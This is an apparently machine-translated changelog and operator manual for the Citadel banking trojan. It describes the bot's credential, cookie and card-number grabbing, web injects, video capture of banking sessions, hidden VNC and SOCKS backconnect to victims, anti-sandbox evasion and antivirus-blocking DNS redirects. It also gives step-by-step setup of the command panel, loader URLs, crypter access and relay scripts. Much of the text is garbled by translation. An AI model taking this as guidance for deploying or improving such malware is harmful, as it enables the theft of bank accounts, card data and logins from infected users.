Now, in addition to the built-RC4, which is encrypted with your personal signature, the software is also built-in AES encryption, the output we get the AES128 secure handling bot <-> gate. No ZeusDecryptor'y (ThreatExpert) and automate reversing will not interfere with your comfort in the moment (Jan 2012).

[+] All the basic functionality, the remainder is present from Zeus. I think you should not write it here again.

[+] Fixed a bug report IN records from Web-filters in the configuration with the "!" (Neglect), which was to exclude all references given, and instead did the opposite and write to a log.

[+] Added new option in the filter config-file, and it is a function to send or not send the cookies on the server.

Option static config disable_cookies 0/1 indicates whether to disable grabbing cookies (1 - disable 0 - enable).

Manual, also, cookies may be obtained from the admin team user_cookies_get, if you really need.

[+] Added the function of any open page deflotovym user's browser on the boat.

For example, if you want to cheat any counter or statistics on voting or want to dop.dohod with your botnet shopami opening page (as well as: pharmaceutical, gambling, drop-projects, etc.). A great way to advertise the necessary Page!

A new option url_open <url>

[+] New type of filter WebFilters in the configuration file in the assembly.

Two new parameters: P and G.

Parameter P is given to the link points to a record only POST requests (all others are ignored), with this link.

The parameter G indicates the recording just GET requests (all others are ignored) with the given link.

Parameters can not be combined, ie should indicate any one of them.

[+] Added a modular software system that gives us:

* Scalability and load any operating functional bot-oriented for the Citadel.

All modules are loaded from the server and dynamically decompressed in memory, which eliminates their detection.

Storage and transfer to the outside world only in encrypted form.

The modules are loaded in a process of trust, so weighty save memory.

Great handling - modules can be disabled via the config.

[+] Video Grabber remade on a modular basis. Now the weight of the build nekriptovannogo <190 kb. Always.

[+] Added new option timer_modules (timings for loading modules).

[+] Added support for new Google Chrome browser 17, and fixed a bug with handling Flash'a in it.

[+] Added support for macros. Introduced macros:% BOTID%,% BOTNET%

* Can be inserted into any part of the injector macro data and upload to your server (AS / injected), transferred the name of the boat and the name of a botnet.

[+] Added commands four modules (on / off, Disable / enable the download.)

[+] Added new option disable_httpgrabber 1/0 for Chrome: eliminates the handling of conventional HTTP (not HTTPS) requests.

[+] Added a full account in the User-Agent reports HTTP (S) grabber allows cloning holdersky UserAgent through any type of utility CCTools.

[+] Added an entry screen resolution reports HTTP (S) grabber, an example of "Screen (w: h): 1600:900" - useful when cloning settings Holder, many banks are paying attention.

[+] Changed the protocol to send video files to reduce load on the server (some have had problems with the load on the server and it is strongly inhibited)

[+] Added ability to send jabber-notifications to multiple recipients in admin Citadel.

[+] Added ability to specify multiple url_config'ov (the way to the main config file), used to be this: if you have the basic configuration is not available at the time installs a bot, then the backup can not be downloaded, and now this problem will not be trying to pull off and the bot config from another URL'a (You can enter up to 20 reserve).

[+] Fixed a bug in Google Chrome (17x) leads to a sub-hang, when you open multiple tabs with injected.

[+] Added new command:

- Getting information about installed software (the list - the company | product | version) on your computer: info_get_firewall

- Getting information about the installed antivirus on your computer: info_get_antivirus

- Getting information about the installed firewall on your computer: info_get_firewall

The information comes as a separate report for each bot. Soon integrate the bulk statistics of the installed software in admin Citadel.

[+] The algorithm for a number of antiemulyatsii AB (not considered kriptor, software has become invisible for a few proaktivok).

[+] Fixed a problem running as SYSTEM.

[+] Added Jabber-specific notifications upon detection of bots specified by mask (eg a mask * corporate *, will look botid with such a coincidence), even if they did not send any log files, the script will notify you in Jabber-communication about the appearance of a bot . Now you do not miss the eye past the security bots.

[+] The admin has a new section of "Efficiency and Security", we had integrated with the service scan4you, and now you can one-click check all of your executables builds at once in the admin palevnost Citadel, well, you can set automatic scan every file day, and if one of your files by more than third palitsya antivirus, you will immediately receive a notification in your Jabber, so you can

immediately replace the exe file. Now, the mechanism will work for you automatically, too lazy to health!

[+] Some customers have complained that only 40% of bots to the new updated version of the exe, the rest can not upgrade for some unknown reason. Indeed, the bug was from the time of Zeus, we have investigated and corrected. Now, a new parameter in the config file: timer_autoupdate 8

In which set the time (in hours), how often to download exe file and restart the server (RC4 key must match). 80% of the bots are now updated successfully, and the crypt perezalivat exe, survival increased by 37.1%, your bots will have the most fresh and clean build.

[+] Changed the system to send reports to a server in previous versions of each report, place the unit sends a POST request to the gate, in the new scheme, reports are sent a pack of a few pieces, it allows to minimize the number of sessions on the server and the server load is minimal, to withstand a large number of bots online.

[+] Video format from bots changed to. Webm (HTML5), we have built online video player admin Citadel, now you can watch videos right in your brauezere (recommended Opera). Of the possibilities: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.

But that was not enough and we went on, many of you use (it is time to use and develop all industries combined) AZ and personal admin for injector / akkov collection, etc. Would you like from your admin to watch over the bay, or how you inject on the boat? It's easy! We created the API-system, you can now send BotID or IP-address of the script, and the API will return to you ready to code HTML-embed all the videos on the bot and you can insert and watch at least a narod.ru, without going to the admin Citadel.

[+] Added a handy parser parser system commands (CMDList) in the control panel, you can now see the new format as a table, the results of the system commands such as: ipconfig, a list of PCs on a LAN, a list of processes, etc.

[+] Now when you install the build on the bot will automatically be sent to the one-time admin cleduschaya information: installed firewalls, antivirus software installed, installed programs.

You can look for a particular boat, and for the entire botnet. We have created a separate section, where you can see all the statistics in the form of visual graphics and calculations. Now you know whom to fight.

[+] Added ability to "Selected logs", you can tag any interesting account (account) when searching for data in the admin and then easily find it unnecessarily, he will be allocated a different color.

[+] Implemented injector compatible with UTF-8 (now injected, you can insert any of the languages ​​such as Japanese, Chinese, etc.)

[+] A crypt in the admin panel Citadel. This section in the admin panel that allows you to update the bot exe file directly from the web. At any time, you can redownload the right exe file and boots it will download in a timely manner. History is in the format of downloads: File | Date Downloads | Paid (Y / N)

Regarding the latter point, we divided the powers and created a separate category of users with "kriptera" - these users have access to your panel as you wish, and the only privilege of the user - the ability to update the exe file, and you can mark in the table, paid concrete crypts or not.

You can enable jabber-notification of result checking scan4you.

[+] Added full-screen screenshots (option in the config file - "@ @").

[+] Improved avtoapdeytinga: If you are faced with a big load on the server when you upgrade (or bots do not move to the new admin panel), this fix corrects this situation. Fix includes:

- Old report from the previous version are removed during the upgrade exe (tmp file), an additional safety net.

- Heavy Records (video and other file report) further validated and removed in case of problems (for example, if the file already downloaded)

- Changed the initialization apdeytinga, resulting in isklchyuchen deadloc and the opportunity to further update when a file system error.

[+] Fixed the problem of garbage in the admin log: Logging removed completely Flash-movies (swf / flv) from logs and the whole Facebook, because a lot of trash talking from them.

[+] Module "Qualitative test WebSocks" is now built into the admin panel, no extra scripts. Shows: country, state, city, hostname, uptime and ping lag.

Ability to enter this section without a password, for convenience when you need urgent Sox smile.gif

[+] Module "log parser" is now built into the admin panel, no extra scripts. The interface is much improved, the ability to create "the chosen domain," "archive logs" and the ability to parse https or http domain names to choose from. Builds up a visual table of all domain names that appear in the logs.

[+] Added "Notes" in the admin Citadel, something like a online notepad. Admin interface is adapted for tablets iPad / Galaxy Tab.

[+] Improved module "VNC-admin panel", now it is built directly into the admin Citadel, no extra scripts. All set to 1 click. Many new features, namely:

- Ability to work with the API, you pass BotID or IP-address of the script, for example through the inject, and it sets the VNC / BackConnect Socks-connection by sending data to connect you with Jabber. You can call the script at any time, apply to AZ.

- Instead of each report in the "Database Search" appeared four buttons: "Add to Favorites", "Connect VNC", "Connect BC Socks", "Autoconnect VNC", "Autoconnect BC SOCKS"

- AutoConnect VNC when this option is enabled, the bot will install vnc-connection at each resume online, unless you disable it.

- AutoConnect BC Socks when this option is enabled, the bot will set backconnect socks connection for each output in the online, the other options provide one-time connection.

- Now you can automatically generate VNC / BC SOCKS-connection as soon as the boat came from the right account for URL-mask, parse hotcakes.

- Next to each account for URL-mask write date of last entry in this ACC (last login), you no longer need to check on the activity of accounts - for you it will make scripts.

- Ability of any notice of a few Jabber'ov immediately.

[+] Fixed problem with chain hooks in Chrome.

[+] When you start user_execute with the flag "-f" to force is put only apdeytinga exe and will not be run as a installer.

[+] Optimized work gate, thus reducing the load. Simplifying admin installer that allows you to install all modules in one click.

[+] Added support for new version of Chrome 18 [injected / formgrabbing]

[+] Added button "All reports bot" in the admin, you can view the beginning and end of the reporting on the specific bot.

[+] Fixed a bug with manual command dns_filter_add, blocking URLs are now working correctly.

[+] Fixed bug with display of exe files on the main page, now deleted exe disappear automatically.

[+] Fixed a bug with the work of the Task Scheduler scan4you, a daily check of the exe file is working correctly.

[+] Added a unified system of CRON-one cron-job runs all tasks now: jabber-notice inspection of files, work units, etc.

[+] Added ability to delete a video from admin.

[+] Added a reference to the notes in Jabber bot in the VNC-module.

[+] Updated GeoIP database (late 2011).

[+] Last of the domain AdvancedConfigs triggered with a delay, is made in order to protect your backup URLs from automatically grabbing hanipotami.

[+] Fixed a script in the zip archive data in the admin (fsarc.php)

[+] Settings Jabber-account and all parameters are now made in the general settings.

[+] Now you can specify the path in the config file with httpS :/ / (unsigned certificates held)

[+] Fixed case-sensitivity to inject now <BODY> and <body> the same entity. All injected insensitive.

[+] Completely redesigned interface web admin, user-friendly.

[+] Added online preview screenshots from the admin. Screens are arranged in series in order of appearance, it is easy to switch back and forth keys are sorted. There is no point to download more pictures and watch one. Virtual Keyboard / pages can be seen consistently.

[+] Added otstuk history, you can view your stats otstuk botnet (the active, total, percentage) for a week, fortnight or month.

[+] Added the version history of software, you can see statistics on the Citadel updates in your botnet. Will you know how many bots taken over to the new version, and how much is left on the old. Draw a diagram.

[+] Ability to search log, only bots that are online.

[+] Ability to search across multiple logs of keywords at once, and they can be saved as an alias and not when you next enter the search again, simply choose from the list.

[+] Added button "Cookies" in the context menu on the bot, which allows for the rapid withdrawal of all Cookies bot, if you do not cut off. Saves time.

[+] Integrated functionality to export FTP-accounts in the API, useful if you are using a third-party software-class FTP-Iframer, allows us to derive a plain-text/xml/php format ftp-acca on the date.

[+] Added button "Whois" to view the report, one click lets get all the information on the IP-address of the report.

[+] Added a comment to the bot when viewing the report, as well as the time when the boat was last online.

[+] Created a new section "Selected Records", which allows you to save a quick link to the desired report + nimu comment. For example, if you come across an interesting account, click "Add to Favorites" and a report will be displayed in a separate section, with automatic data Whois'om your comment. Keep acca on the spot.

[+] Added antiemulyator, which allows you to protect your botnet on the reversing and getting into trackers. When you start, build a detective that he was running in a virtual machine or a sandbox CWSandbox, VMware, Virtualbox, Sandbox, he starts to behave differently and your botnet go unnoticed. Details were not disclosed, tk's announcement is in the Public and the technology is very tricky.

Of the minuses: can not test the work in Vmware, have to do it on a real PC or Dedik. The option is moved to the config. antiemulation_enable 0/1

[+] Added Bot status "Online / Offline" when viewing the report.

[+] One of the most important features: Preview report in the search logs. No need to open more than 200 windows in your browser to view each report, and each link. Now you can easily click on a preview to make a report, and if the report will be of interest, then view the full version.

Supported by the rapid switching between reports keys back and forth-ESC.

[+] Updated cronjob script cleanup of old scripts (commands). Now everyone has to work without bugs.

[+] Added context menu option "Screenshots bot"

[+] Module VNC-admin: added sorting by date of last connection / OS (for example, if you only need to WinXP).

[+] Module log parser: added sorting by domain / number of reports in descending order.

[+] FTP-module ifreymer: Fixed bug with "smart" ifreymingom when the quotes in the code iframe-screened. The current owners are encouraged perezalit script pad.

[+] Since the previous encryption algorithm has been hacked a few months later, because of this, some customers got into ZeusTracker. We have developed and implemented a new encryption algorithm based on modified RC4. In cryptography uses a special key known only to the client. that requires its presence for decryption. Because each client's own indvidualny key, now from one client will not suffer all the rest. If you got one, others will be protected from this. Now we are completely isolated from the automatic analysis builds. As a result, we obtain the two-level authorization, protection from the boat trackers.

[+] Did cropping options X-Frame-Options in Header'ah, unnecessarily, it may interfere with some inzhekta work.

[+] Be done to correct formgrabbinga / inzhektinga in Chrome 19 (19.0.1084.52m)

[+] Works faster on large botnets admin.interfeysa + gate expense of functional optimization GeoIP-database.

-------------------------------------------------- --------------------------

UNDERSTANDING TO SIMPLIFY THE INFORMATION, YOU CAN SKIP SECTIONS

Where is the INSTALLATION AND USE OF UNITS THAT you do not get

USE CTRL + F to search for key words and definitions.

EXAMPLE OF ADEQUATE TIME UNDERSTANDING OF ALL FUNCTIONS SOFT - 1 WEEK.

-------------------------------------------------- --------------------------

1) Access to CRM

http://citadelmovement.com/crm/

First citadel; rightway

then

Login: XXXXXXXXXXXXX

Password: XXXXXXXXXXXXX

What is Citadel CRM Store?

It is a system of interaction between our customers and the developer.

Perhaps you are familiar with the situation where a support product ignore your request to icq / jabber 'e - this contributes to a high load of the person who is responsible for all this because a lot of customers, and he is one, but still busy with chores.

With us, this problem is not relevant. Especially for you has developed a system through which you can immediately report a bug in software, and we, in turn, it quickly fixed a, if any. All requests received more than one person at a time, with notices of jabber / sms. You quickly get a response within the ticket system.

Do you have a great idea to finalize the software and you want to share it with the developer (even if it's even the smallest idea: for example you do not like the icon in the menu) - we're going to meet you.

You can create two types of applications (see projects) within the CRM:

a) Public Bid - a bid to the topic description + (better put TK), which will see all clients, they can discuss it in the comments, offer good value for money for the implementation of and to vote: do this application or send it to the trash.

You can create these types of applications, and can vote and do any act in relation to other requests of our customers.

b) The private bid - if you want to offer our developers indvidualnuyu problem and a good price for the implementation, this type of application for you. It can only see the developers (ie us) and you. If all conditions are satisfied both sides, this module only get you.

All topical application, you can see in the "discussion on"

The right to vote has 4 meanings:

We need, I get

Useful, but I do not need

Absolutely not needed

No need, I do not possess

Please, if you see a new application - vote for it, even if you do not need it! We have a very narrow range, so it is YOUR opinion is crucial by for ALL, do not stay on the sidelines.

Any developments within the CRM (solutions, applications, comments) you will be notified by jabber-bot channel. This is done for your convenience, so you do not refresh the page every time. But still, it is useful to go every 3 days in SRM'ku =) The faster voice and opinions are - so speedily develop our product.

If the application is gaining a lot of abandoned votes, it goes to the "Application Rejected" and closes.

If the application is approved by the developers, it goes to the "Under Construction"

For each application in this section, we make changes to the format of date - what has been done

So you can see the process of working on the module.

Do not forget to specify the desired advertised price per module, for which you would have appreciated the improvement.

All the news we publish in the "News" section, if you do not come to notice in Jabber, please report it immediately to our support!

You go once every 3-4 days in the CPM and check the news and comments on the request.

2) A list of useful links that will help you:

 1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:

 http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe

 2) The image of the English-language Windows XP SP3 (Corporate Edition):

 http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso

 Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG

 3) Development Kit to create an injector + examples (author unknown):

 http://www.citadelmovement.com/software/injects_development.zip

3) Install Citadel

Folders:

builder - Builder Kit

backconnect - Download BackConnect VNC admin, namely, php scripts for Backconnect Windows server.

webserver (either server [php] - admin panel, gate

************************************************** ******************************

========================== >>>>> Step-By-Step Installation Citadel

************************************************** ******************************

********************

Requirements for the >>>>>>>>>> server.

********************

PHP> 5.3, Mysql 5 (preferably the latest version)

cron, apache. At the request of nginx and control panel cPanel or DirectAdmin.

+ Windows VPS if purchased VNC admin (on the module below)

********************

Step 1 >>>>>>>>>>

********************

When you start builder.exe, will be a line

Authorization key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

This is your key to indvidualny protection trackers (we call it even LOGIN KEY)

It must be placed in the file webserver / system / global.php, which contains the line

define ('BO_LOGIN_KEY', 'PUT_KEY_HERE');

Insert the key here, ie obtained

define ('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');

THIS VERY CAREFULLY CHECKING THE MOMENT! 80% of Fit Clients simply forget HERE YOUR KEY FROM Builder AND SO IN GLOBAL.PHP BOT does not knock in the Admin. Check this MOMENT PLEASE! If a key already entered, then everything is OK.

Then set chmod 777 on the folder:

system

system / data

Also, it is necessary to put before setting chmod 777 on the entire folder webserver, after a complete installation - the right to return the folder to chmod 755

Following these above actions, I've found open webserver / api.php

and change the line define ('API_TOKEN_KEY', 'changethispassword');

for any random password, for example define ('API_TOKEN_KEY', 'dgwd23gwegw');

This is necessary so that you are protected from hacking and you are not compromised through the script API, deflotovy change your password.

********************

Step 2: >>>>>>>>>>

********************

We go to http://www.htaccesstools.com/htpasswd-generator/

Enter any name and password is issued a line of type a: $ apr1 $ HE / llFvK $ u3YAEGm277SkotywpTl9w /

Save this one line in the file. Htpasswd in the webserver directory

After that, create a new one. Htaccess file in the directory webserver

There we write:

<Files Cp.php>

AuthName "Your ID"

AuthType Basic

AuthUserFile / put / do / faila / .htpasswd

require valid-user

</ Files>

Where / put / do / faila / .htpasswd - replace to your unix-end path.

Now, when entering the admin cp.php, additional protection is a pair of login and password.

You can do things differently and not to create. Htpasswd, but simply to create a. Htaccess file and write there a line:

<Files Cp.php>

Order Deny, Allow

Deny from all

Allow from 111.111.106.111

</ Files>

Where 111.111.106.111 - your constant IP, now the admin panel will be available only from your IP.

Which way you prefer - you choose.

********************

Step 3: >>>>>>>>>>

********************

Open the file config.txt and consider new options inherited from the old versions of Zeus remained the same, so we will not dwell on them attention.

  entry "Video"

    a quality

    length 60

  end

Section for setting videograbbera: length the length of each video in seconds is recommended that no more than 10 minutes (600 seconds) formed a very weighty because the patched files.

Quality - from 1 to 5, the video quality. It is recommended to keep a default, to save on the amount of video files.

Video recording is triggered when approaching the desired link and we removed exactly length-seconds.

To specify that we need to take a mask, go to the section entry "WebFilters"

  "# * Paypal.com / *"

  

  # symbol in front of the mask is activated recording.

  

The section is very thin, because quite a heavy load on the server, specify the exact how to mask and only the very links you need (for example bank.akki)

It is recommended to configure the server apache & php - for receiving files over 50 MB via POST.

Guide to setting up a server is here # http://jdownloads.ru/faq/8-how-uploadbigfiles.html

Test your attentively surveying the video is NOT a virtual machine, unnecessarily due to lack of correct ones, may be such that on virtualke will not shoot video.

Videos are added to the format. Webm, in a folder _reports / * BOTNAME * / videos /

They can be found by searching for files in the admin, or browse through the online player (section "View Video"). It is recommended to view in Opera and Firefox, other browsers are not tested.

 entry "CmdList"

    "Hostname"

    "Net view"

    "Ipconfig / all"

  end

  

A list of system commands that the bot will perform for the first time on a running system, and send to the admin panel.

In the admin, you can find the commands as a result of the type of report, "The result of CMD-command"

With him will be a list: the bot - the result of command execution

in a convenient format (Section CMD-Parser)

  encryption_key "key"

  Be sure to ask here a random key, this key is also known as RC4 Encryption Key - you have to ask the admin to install the uninstaller, you can change it in Settings. It should not be too complicated or too simple, identical in configuration and admin. Not recommended to put more than 10 characters! You should use lower case and special symbols!

  

 entry "DnsFilters"

    "Microsoft.com = 127.0.0.1"

    "Myspace.com = 127.0.0.1"

    "Gruposantander.es = 127.0.0.1"

  end

Ability to create a DNS-redirect or block the AV-server, or an unwanted URL (for example, if you find that downloading the logs go to someone else and need someone to block the gate).

Specifies the IP-address for the redirect.

DNS Redirect does not work for browsers, but for all software, which will be knocking at this domain. All these requests will be redirected to your IP.

Now it is important! The resulting config BUILD, exe file and video.modulya (to create it, you press the button Assemble modules), we put in a folder webserver / files /

As a result, we get 3 files in the folder files. Config video.modul, exe file. Do not forget to zakriptovany exe file before placing it in the folder, otherwise it will be such that the timer auto-update, the bots will start downloading the exe, which palitsya.

 url_config1 "http://localhost/file.php|file=test_config.bin"

  Specify here test_config.bin - the name of our config, we have filled in the files / taking into account where the file file.php (as it lies above the folder files). The symbol | you should not confuse, it is here specifically.

  

 url_config1 must be specified, you can also write multiple backup config URLs, in case the first domain while you sleep went to Down, unnecessarily bots will not reach your config if you will not be able to download the basic configuration.

 In this case, write another line under the url_config1:

 url_config2 "http://localhost/file.php|file=test_config.bin"

 Is optional. But there can specify up to 20 backup configs, the bot will turn to knock on each of the URLs have not yet set a config file. In the last url_config bot knocking delayed 5 hours, this is done to protect against automatic parsing URLs reverser.

 url_loader "http://localhost/file.php|file=test_bot.exe"

  test_bot.exe - here indicate the name of the exe file, which is in the folder files /

  Do not rename the file file.php, leave with the same name. Way do file.php, directory files / lies next to the file.

   url_server "http://localhost/gate.php"

   It points the way to gate.php

   The rest is configured as Zeus, if you forgot to format, read the manual from Zeus zeus_old.txt

With the advent of version 1.3.0.0 shall appear the need to collect the modules (eg videograbber) to build, unnecessarily bots will pump out the necessary modules from your server.

Therefore, after the assembled exe, click the button "New Modules" and upload the resulting file / files to the webserver \ files on the server. This is done MUST! EVEN IF YOU DO NOT USE VIDEO.MODUL! AKA BOT WILL NOT knock on the admin.

   

  

  Once we have uploaded the files in the files, and filled the whole folder as a whole created a webserver + database.

  Go to the address: http://www.vash-host.com/citadel/install

  And we enter all the values, then delete the directory install.

  

  

************************************************** ******************************

Installation ========================== >>>>> BackConnect Windows Server (required for operation of VNC-admin)

************************************************** ******************************

To install the server side, you need a Windows VPS / Dedicated preferably XP, 2003,2008

We put the web server XAMPP / WAMP, or any other supporting PHP. Turning off UAC + Windows Firewall, so you can open the ports. Also disable the domain policy and come out completely from any domain.

Fill in the web directory scripts set backconnect \ winserv_php_gate

Web admin panel will address: http://ip-serv/control.html

It will log on the VNC connect.

Possible problems: because vindovyh firewall, check this point carefully. Do not forget to restart Windows after disabling firewall.

All scripts must lie at the root of the server, not to create any folders.

If you do not know how to put XAMPP, that's Manual: http://www.ripecms.com/documentation/articles/installing-apache-php

************************************************** ******************************

Installation ========================== >>>>> Citadel VNC Admin

************************************************** ******************************

If you purchased the module VNC-admin, then in your panel will be available to the section "VNC".

Go over the options with which it can be difficult.

To get started, you have to press the "Configuration" and write there IP-address Windows-server where you have already filled scripts backconnect'a. No way do not just IP-address.

What is different from the Connect avtokonnekt?

If you specify a connection to some bot, it will execute this command one-time fee and you yyshlet data connection. If you ask avtokonnekt, the bot will initiate a connection to backconnect-server every time, as soon as he goes on the Internet. This option applies to both Backconnect Socks, and to the VNC.

Now we define a URL-masks, which we catch in our VNC admin.

Mask URL: URL is pointing to the scheme * mail.ru * or http:// *. Bank.com * (can be played as you like, to help you use the asterisk)

Parameters: Enter here the name POST-variables that are on the form of a site that we catch. On the example of mail.ru, it will be a Login * and Password *

The format parameter is simple, you can specify "login =", you can specify "login *", or simply "login". So choose as you like, do not forget to test the mask.

Parameters are not case sensitive.

Notify me of Jabber?: Put option if you want to make each new captured the ACC come to you. Jabber is defined in the settings, you can specify several, separated by commas.

IMPORTANT! To see the "Options" were written data Jabber-bot (Use only Jabber.org), from which all this will come to you.

Also, there is the possibility of creating Avtokonnekta with the bot, which came from the new account in the section. Ie in the gills immediately comes to you account for the konnekta + port on the VNC / SOCKS.

Do not forget that runs in front of the popup menu bots, links, etc. through the right mouse button: you can delete any unwanted acca (send to trash), mark it as your browser or enable / disable your settings.

Line two boats, six accounts, five live accounts (83%) calculates the% of live accounts on the basis if the bot did not show up in a network of more than 4 days, the account is dead.

Also, there is an API for rapid creation of VNC / SOCKS connections with the right boat, for example during the interception of a token or a message, you should immediately go to the ACC under the Holder, the injector you are a javascript / iframe call a URL to api.php

 * VNCController

 * Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = VNC

 * Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = SOCKS

 * Api.php / <token> / vnc / connect? BotId = WIN-ABC123 & protocol = VNC

 * /

define ('API_TOKEN_KEY', 'changethispassword');

And pass the IP or BotID, the script tells the bot to establish the connection and the data come to you in zhabber. Timing depends on a parameter in the config timer_stats Builder.

Here's advice on dealing with bots on Win7/Vista: Use Firefox portable for Win7/Vista - it works correctly. Do not forget to disable the wallpaper does not drive much traffic. Also, to get into one of the directories - press the shortcut properties.

************************************************** ******************************

========================== >>>>> Installing chekinga web proxies

************************************************** ******************************

Section "SOCKS" in the admin panel - no need to configure anything.

************************************************** ******************************

========================== >>>>> Installing a log parser

************************************************** ******************************

With version 1.3.3.3 of the admin module is available under "links", there should be no difficulty.

************************************************** ******************************

Work with a >>>>> ========================== crypt-panel

************************************************** ******************************

There is a section "crypt exe" aka "crypt exe" and it shows in the main admin Citadel. If it's not there, then read below how to activate it.

It is needed in order for you to grant access to your kripteru and he periodically perezalivat exe file that bots update.

In this case, kripter does not have access to the rest of the admin, it is only available for this section.

To begin with, activate this section of at home, for this go to "Users", click on your username below and see a list of options available to us. Tick ​​two points:

r_svc_crypter_crypt - This item gives privileges perezalivat exe file.

r_svc_crypter_pay - This item gives privileges to the table payments to perezalivkam.

Then create a new user and give him ONLY "r_svc_crypter_crypt" right, pass the login and password kripteru and it can form a perezalivat exe files in the folder files /

Do not forget to set chmod 777 on the folder and access to only trusted proxies.

Now, as soon as kripter perezalivat exe file, a new record in the table that the exe file is not paid, you will, in turn, checking everything is ok, mark in his admin that the crypts of X on a certain date paid.

You can enter data for the Jabber-notice verification scan4you in this section.

************************************************** ******************************

Installation ========================== >>>>> redirect (gasket for config)

************************************************** ******************************

Generation of gaskets (file.php) to protect the config (complete system redirects) BETA-version.

Generator pads solves the problem of transfer file.php on a single host, you can redirect juzat a-laying up to your main config file and the exe file.

Generation of gaskets provides a builder for this new button "Collect pad."

At the output we get 2 file, file.php, file_config.php (the name specified in the dialog box when you save is ignored (!)).

NOTE: file_config.php contains your encryption key in a modified form, it is taken out of your config, so the generation of gate configuration must be configured and valid,

Now load the files file_config, php, file.php on the pad and create a folder in the same files, which put the exe, config + video module files.

To prevent direct access to the files in the folder files are creating. Htaccess file as follows:

deny from all

In the setting of the config ask url_config1, url_loader up pads.

If you want to protect the gate and create a seal, I've found there are other / redir.php, open it and put this path to REAL gate

/ / URL of the original server.

$ Url = "http://localhost/s.php";

After that, save the sript under any name and set the bot in the config file path as the gate (url_server)

It is very important! To the host were allowed sockets in PHP, otherwise it will not work.

You can check this by creating a file with 1.php <? Php phpinfo ();?>

He must show Sockets Support enabled

Gaskets are not currently transmit video and screenshots, logs only. This is the only minus.!

************************************************** ******************************

Summary ========================== >>>>> manual for new ficham

************************************************** ******************************

1) In the admin there is a new section of "Efficiency and Security", we had integrated with the service scan4you, and now you can one-click check all of your executables builds at once in the admin palevnost Citadel, well, you can set up automatic scanning of files once a day and if one of your files over palitsya 3rd antivirus software, you will immediately receive a notification in your Jabber, so you can

immediately replace the exe file. Now, the mechanism will work for you automatically, too lazy to health!

=> To get started click the Settings button: Enter there Scan4you Profile ID (IMENNO ID, NOT LOGIN!!), Scan4you API Token, Jabber for notifications. Get the data can be in your profile scan4you.net

Then go to Settings, and enters the data Jabber-bot (pre zaregatsya account for the bot), it is recommended juzat jabber.org

Everything is ready.

2) Some customers have complained that only 40% of bots to the new updated version of the exe, the rest can not upgrade for some unknown reason. Indeed, the bug was from the time of Zeus, we have investigated and corrected. Now, a new parameter in the config file: timer_autoupdate 8

In which set the time (in hours), how often to download exe file and restart the server (RC4 encryption_key key must match). 80% of the bots are now updated successfully, and the crypt perezalivat exe, survival increased by 45%, your bots will have the most fresh and clean build.

=> The path to the exe-file is taken from the section "url_loader", respectively, the more often you clean perezalivat exe, the exe-file cleaner are your boots at home. They download it and restart, renewing itself.

4) Video Format from bots changed to. Webm (HTML5), we have built online video player admin Citadel, now you can watch videos right in your brauezere (recommended Opera). Of the possibilities: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.

But that was not enough and we went on, many of you use (it is time to use and develop all industries combined) AZ and personal admin for injector / akkov collection, etc. Would you like from your admin to watch over the bay, or how you inject on the boat? It's easy! We created the API-system, you can now send BotID or IP-address of the script, and the API will return to you ready to code HTML-embed all the videos on the bot and you can insert and watch at least a narod.ru, without going to the admin Citadel.

=> That's all you can see in the section on-line player, figure it out it's simple.

=> Manual for exporting video files to adminok AZ-based online player.

Queries like this:

/ Api.php / megakey / video / list.php? Botnet = COOL & botIP = 111.111.111.111

/ Api.php / megakey / video / list.php? Botnet = COOL & botId = 017_B4DF7611E03FF4C8

in response to issue php-arrays or JSON

Format of queries:

api.php / <security-token> / video / <action> [. <extension>]? <params>

<security-token> the-key that you specify in the script and he api.php need to log on the server.

<action> - team

<extension> - (optional) extension: the output format. If you omit the - see debug-output. Vozvozhnost values:. Dump,. Php,. Json,. Xml

<params> - function parameters of the controller (you can see in the code)

Examples of queries:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1

This parameter is optional botnet.

citadelhost.ru/folder/api.php/ahro4uNg/video/list? botnet = COOL & botId = SURAKSHYA-PC_775A658D6522DF69

And again, substituting the expansion - you can get the desired format:

adding the parameter & embed = 1 can be obtained directly insert HTML-code for all the videos, but I do not recommend: there may be many) out there for this is a separate function.

Example without reference to the name of a botnet:

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69

http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1

5) Added a handy parser parser system commands (CMDList) in the control panel, you can now see the new format as a table, the results of the system commands such as: ipconfig, a list of PCs on a LAN, a list of processes, etc.

=> You will see a separate section "CMD parser."

6) Now when you install the build on the bot will automatically be sent to the one-time admin cleduschaya information: installed firewalls, antivirus software installed, installed programs.

You can look for a particular boat, and for the entire botnet. We have created a separate section, where you can see all the statistics in the form of visual graphics and calculations. Now you know whom to fight.

=> The "Installed Software" if you see a lot of charts in the "Unknown" mean on the boat should not be anti-virus or firewall. Also, pressing the search for reports on the boat, you'll see a new kind of report.

7) Ability to "Favorite logs", you can tag any interesting account (account) when searching for data in the admin and then easily find it unnecessarily, he will be allocated a different color in the "Selected Records"

=> New parameters in the configuration file.

enable_luhn10_get a

enable_luhn10_post a

GET LUHN10 - analyzes the data in the GET-requests and WinSocket / Wininet for maps and dumps, the algorithm en.wikipedia.org / wiki / Luhn_algorithm

POST LUHN10 - analyzes the data in the POST https:// requests.

To find the map, select the type of report: "LUHN10 request" in the "Database Search".

8) Work with API.php. Through the API, you can pull the ftp-akkunty your ifreymera.

 * IFramerController:

 * Api.php / <token> / iframer / ftpList

 * Api.php / <token> / iframer / ftpList? State = all

 * Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31

 * Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all

